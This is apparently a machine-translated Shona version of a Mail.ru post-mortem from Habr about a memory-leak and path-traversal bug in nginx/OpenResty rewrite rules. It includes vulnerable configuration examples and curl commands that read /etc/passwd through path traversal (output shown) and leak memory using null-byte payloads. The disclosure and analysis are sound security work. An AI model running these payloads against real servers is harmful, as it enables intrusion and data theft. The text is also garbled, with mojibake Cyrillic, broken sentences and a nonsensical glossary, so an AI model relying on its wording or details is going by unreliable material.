Rimwe gore rapfuura, Kurume 21, 2019, mukati
Uku ndiko kukanganisa kwakanyanya nekuti ... zvikumbiro zvinewo makiki emusangano. Maawa mashoma gare gare, gadziriso yenguva pfupi yakaitwa iyo yakasefa zero byte (sezvazvakazoitika gare gare, izvi hazvina kukwana, nekuti pakanga pachine mukana wekubaya jekiseni CRLF / ASCII 13, 10, iyo inokutendera iwe kushandura misoro uye dhata yemhinduro yeHTTP, izvi hazvinyanyi kukosha, asi zvichiri zvisingafadzi). Panguva imwecheteyo, dambudziko rakaendeswa kune vanoongorora kuchengetedza uye vanogadzira kuti vawane uye vabvise zvikonzero zvebug.
Mail.ru mail ishandiso yakaoma kwazvo; nhamba huru yezvakasiyana kumberi-kumashure/kumashure-kumagumo zvikamu, zvese zvakavhurika sosi (zvizhinji zvekutenda kune ese emahara software vanogadzira) uye mukati meimba yakagadziridzwa, inogona kubatanidzwa mukugadzira mhinduro. Isu takakwanisa kusabvisa zvese zvikamu kunze kwe nginx uye openresty uye kugadzirisa dambudziko tisati tafona
OpenResty ipurojekiti yakakurumbira inokubvumira kunyora zvinyorwa zveLua mukati me nginx, uye inoshandiswa mumapurojekiti akati wandei eMail.ru, saka dambudziko harina kunzi rakagadziriswa. Uye mushure menguva yakati, vakazodzokera kwairi kuti vanzwisise zvikonzero zvechokwadi, zvinogoneka mhedzisiro uye vape mazano kune vanogadzira. Akatora chikamu mukucherwa kweiyo source code
- Mu nginx, kana uchishandisa rewrite ne data remushandisi, pane mukana wedhairekitori rekufamba (uye pamwe SSRF) mune mamwe magadzirirwo, asi ichi ichokwadi chinozivikanwa uye chinofanira kuonekwa ne static configuration analyzers mu.
Nginx Amplify ΠΈgixy kubva kuYandex (hongu, isu tinoshandisa iyo zvakare, ndatenda). Paunenge uchishandisa OpenResty, chimiro ichi chiri nyore kupotsa, asi izvi hazvina kukanganisa gadziriro yedu.configuration muenzaniso:
location ~ /rewrite { rewrite ^.*$ $arg_x; } location / { root html; index index.html index.htm; }
kuitika
curl localhost:8337/rewrite?x=/../../../../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
... - Nginx ine bug inokonzera ndangariro kudonha kana mutsara wekunyorazve uine null byte. Kana redirect yapihwa, nginx inogovera ndangariro nyowani buffer inoenderana nehurefu hwakazara hwemutsara, asi inokopa mutsara ipapo kuburikidza nemutsara webasa umo zero byte iri mutsara terminator, saka mutsara unokopwa chete kusvika zero. byte; iyo yese buffer ine uninitialized data. Ongororo yakadzama inogona kuwanikwa
pano .muenzaniso wekugadzirisa (^@ zero byte)
location ~ /memleak { rewrite ^.*$ "^@asdfasdfasdfasdfasdfasdfasdfasdfasdfasdfasdasdf"; } location / { root html; index index.html index.htm; }
kuitika
curl localhost:8337/secret -vv
...
curl localhost:8337/memleak -vv
...
Location: http://localhost:8337/secret
...
- Nginx inodzivirira GET paramita kubva kujekiseni remavara ebasa uye inoita kuti zvikwanise kushandisa chete GET paramita mukunyorazve. Naizvozvo, hazvigoneke kushandisa jekiseni kuburikidza nemushandisi-inodzorwa paramita mu nginx. POST paramita haina kuchengetedzwa. OpenResty inokutendera kuti ushande neese GET uye POST paramita, saka kana uchishandisa POST paramita kuburikidza neOpenResty, zvinoita kuti ubaye akakosha mavara.
configuration muenzaniso:
location ~ /memleak { rewrite_by_lua_block { ngx.req.read_body(); local args, err = ngx.req.get_post_args(); ngx.req.set_uri( args["url"], true ); } } location / { root html; index index.html index.htm; }
mhedzisiro:
curl localhost:8337 -d "url=secret" -vv
...
curl localhost:8337 -d "url=%00asdfasdfasdfasdfasdfasdfasdfasdf" -vv
...
Location: http://localhost:8337/{...ΠΌΠΎΠΆΠ΅Ρ ΡΠΎΠ΄Π΅ΡΠΆΠ°ΡΡ secret...}
...
Kumwe kuita
Dambudziko rakataurwa kune vanogadzira nginx uye OpenResty, ivo vanogadzira havatarise dambudziko senge bhagi rekuchengetedza munginx, nekuti. mu nginx pachayo hapana nzira yekushandisa kukanganisa kuburikidza nejekiseni reakakosha mavara, gadzirisa
Portswigger
Saka chii chaive chikanganiso uye chii chingaitwa kuti chidzivise?
Paive nebug munginx? Ehe, zvaive, nekuti kuburitsa ndangariro zviri mukati iko kukanganisa chero zvakadaro.
Paive nebug muOpenResty? Ehe, zvirinani nyaya yekuchengetedzeka kwekushanda kunopihwa neOpenResty haina kuongororwa uye kunyorwa.
Paive paine chikanganiso chekugadzirisa/kushandisa neOpenResty? Hongu, nekuti pasina chirevo chakajeka, fungidziro isina kusimbiswa yakaitwa nezve chengetedzo yekushanda kuri kushandiswa.
Ndeipi yemabhugi aya ine njodzi yekuchengetedza ine $10000 bounty? Kwatiri, izvi kazhinji hazvina kukosha. Mune chero software, kunyanya pamharadzano yezvikamu zvakati wandei, kunyanya izvo zvinopihwa nemapurojekiti akasiyana uye vanogadzira, hapana angambovimbisa kuti zvese zvebasa ravo zvinozivikanwa uye zvakanyorwa uye kuti hapana zvikanganiso. Naizvozvo, chero kusagadzikana kwekuchengetedza kunoitika chaiko uko kunokanganisa kuchengetedzwa.
Chero zvazvingaitika, itsika yakanaka kudzikamisa kana kumisa / kusefa zvakanyanya sezvinobvira iyo data yekupinza inopinda mune chero yekunze module / API, kunze kwekunge paine mirairo yakajeka uye kunzwisisa kwakajeka kuti izvi hazvidiwe.
Erratum
Kubva pane zvakaitika
bug bounty - makwikwi ekuvhima tsikidzi
bug report - chiziviso chezvikanganiso
redirect - redirection
open source - open source
kurasika - shanda pane kukanganisa
Source: www.habr.com